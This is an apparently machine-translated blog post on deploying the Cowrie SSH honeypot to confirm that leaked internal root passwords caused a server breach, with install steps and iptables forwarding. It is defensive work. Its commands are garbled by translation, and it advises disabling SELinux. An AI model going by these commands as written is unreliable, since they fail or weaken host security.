In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-03-29 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Share
Shulou(Shulou.com)06/01 Report--
Background
Recently, a number of servers have been hacked, and there are a large number of servers, which has a great impact. Basically, our servers have firewall policies, and the passwords are also complicated. At present, there is no particularly good idea to troubleshoot (because we have not done the relevant log collection or prepared the means in advance before. As a result, there is not much that can be done after something goes wrong, and the hacked machines are basically replaced with system commands, so there is even less that can be done.
When combing through the hacked server, it was found that the firewall of one server was turned off (maybe it was hacked off, maybe it was turned off all the time). Since there is no particularly good idea, let's first set up that this server was hacked first because its firewall was turned off, and then it was used as a springboard to hack other machines one after another. If this assumption is true, that is to say, our commonly used passwords have been included by the outside world. In order to prove this hypothesis, we need some tools. SSH honeypot is the best means of proof, there are many SSH honeypots, after some inspection, finally chose cowrie, in fact, it is not to say that it is the best of its kind, but to take a look at GitHub and find that they are all updated, while some of the other types have been updated for the last time several years ago.
Cowrie introduction
Http://www.cowrie.org/ official website, to tell you the truth, this page is really bad. There are very few things to see or very hidden. I can't find it.
Https://github.com/cowrie/cowrie this is the code hosting GitHub address, the content is OK.
Generally speaking, what we need this time is a SSH honeypot. What is a SSH honeypot? generally speaking, we use a program to simulate a SSH port service, let * think that it is a real SSH service, and then collect relevant information, such as IP, the account used to log in, what actions have been done after logging in, and so on.
Cowrie is rich in its ability to interface with mysql, elk, etc., and can do detailed * data analysis. This article only uses cowrie for verification of our hacked cases, so it only introduces the most basic and practical methods, but does not introduce detailed docking with third-party systems for the time being.
Cowrie installation
The installation method of cowrie is also a bit obscure, which is displayed without directly accessing the GitHub address. You need to manually access the INSTALL.md file of the GitHub address, the address is https://github.com/cowrie/cowrie/blob/master/INSTALL.md.
According to the official introduction, the installation environment should be Ubuntu, and the environment we use is centos 7.0. however, it is more or less the same. The specific installation steps and methods are pasted below. Only some of the official steps are referred to, but not all of them are carried out.
Install and configure cowrie
# install git python-virtualenv, sandboxie, gcc, etc
Yum install-y git python-virtualenv bzip2-devel libffi-devel gcc
# upgrade libcurl, or the git clone code may make an error later
Yum update-y nss curl libcurl
# create a cowrie user to run cowrie instead of using root directly, which is more secure
Adduser cowrie
Passwd cowrie
# enter the password, and then switch to the cowrie account
Su-cowrie
# git, pull down the cowrie code
Git clone http://github.com/cowrie/cowrie
# enter the cowrie directory after success
Cd cowrie
# cowrie relies on python's python virtualenv sandboxie, and supports python2 and python3. The centos 7.0 we use defaults to python 2.7, so we initialize it with version 2.7.
Virtualenv-python=python2 cowrie-env
# Activation
Source cowrie-env/bin/activate
# update pip first
Pip install-upgrade pip
# after updating pip, it's time to install the python libraries that cowrie depends on. Gcc compilers and libraries are needed here, so gcc has been installed beforehand.
Pip install-- upgrade-r requirements.txt
# if all goes well, configure the cowrie file and start cowrie now
# copy a cowrie configuration file and simulate SSH's root account first
# We use the default configuration file, and the default listening analog SSH port is 2222. Here, additional work is needed if it is changed to 22, because running in sandboxie, listening to port 22 requires authorization, so there is a bit of trouble here. We will use the default port 2222, and then use iptable port forwarding to forward port 22 to 2222. This is relatively simple.
Cp etc/cowrie.cfg.dist etc/cowrie.cfg
# create a simulated SSH root account file, because we want to verify that our internal password has been leaked, so we write down our suspected leaked root password. Only these root passwords can log on to our SSH honeypot.
Cat etc/userdb.txt
# the contents are as follows (regular, matching and other features are also supported, which are not available here):
Root:x: suspected disclosure of password 1
Root:x: suspected password disclosure 2
Root:x: suspected password disclosure 3
# once configured, let's start cowrie now
Bin/cowrie start
# after starting successfully, use the following command to see the running process, and use stop to shut down cowrie
Bin/cowrie status
Configure firewall policy
# now that the work of cowrie has been completed, the next step is to forward SSH port 22 to cowrie honeypot port 2222. Before that, let's change the default normal SSH service port from 22 to other ports, such as 7997
Vim / etc/ssh/sshd_config
# modify port
Port 7997
# disable selinux, otherwise modify the ssh port and restart the ssh service will fail
Setenforce 0
Service ssh restart
# release the 22 2222 tcp port so that everyone outside can access it, and join the iptable rule
-An INPUT-p tcp-- dport 22-j ACCEPT
-An INPUT-p tcp-- dport 2222-j ACCEPT
# Last step Port forwarding
Iptables-t nat-A PREROUTING-p tcp-- dport 22-j REDIRECT-- to-port 2222
Test # now let's verify whether cowrie serves ssh root@cowrie address # enter a password other than user.txt, if it is a login failure, it is normal # enter the built-in password in user.txt, and analyze normally if you can log in
The cowrie running log is placed in sandboxie's internal var/log/cowrie. By default, there are two formats: log is a normal log format, and json is a json log format. After running it for only one night, the problem was immediately found. The specific log content is as follows
You can see that outside * has successfully logged in with our internal password, and the following string is what we do after logging in, that is, download a backdoor software and delete it, which is consistent with our preset.
Here we also save all the pl files of * *, and put them in sandboxie's
Var/lib/cowrie/downloads/2438c584311c439b585075c68c443e2e96b43a826aaf42643d7808d436df3731
The log records entered by the command line terminal are placed in sandboxie's
Var/lib/cowrie/tty/1b54104347e987372b323bc6701625889cc01b8de2ce13bc9a297f1f620b5140
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.